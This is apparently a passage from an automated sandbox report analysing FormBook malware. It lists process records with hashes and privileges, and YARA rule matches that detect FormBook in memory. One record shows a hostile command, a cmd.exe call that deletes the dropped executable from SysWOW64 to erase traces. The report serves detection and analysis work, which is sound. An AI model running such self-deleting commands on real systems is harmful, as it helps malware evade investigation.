                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            Analysis Process: explorer.exe PID: 1388 Parent PID: 1900

                                                                                                                                                            General

                                                                                                                                                            Start time:17:18:38
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                            Imagebase:0xffca0000
                                                                                                                                                            File size:3229696 bytes
                                                                                                                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Analysis Process: NAPSTAT.EXE PID: 2184 Parent PID: 1900

                                                                                                                                                            General

                                                                                                                                                            Start time:17:19:05
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                            Imagebase:0xab0000
                                                                                                                                                            File size:279552 bytes
                                                                                                                                                            MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            Analysis Process: cmd.exe PID: 2844 Parent PID: 2184

                                                                                                                                                            General

                                                                                                                                                            Start time:17:19:06
                                                                                                                                                            Start date:22/07/2021
                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:/c del 'C:\WINDOWS\syswow64\calc.exe'
                                                                                                                                                            Imagebase:0x4a5f0000
                                                                                                                                                            File size:302592 bytes
                                                                                                                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis

                                                                                                                                                            Reset < >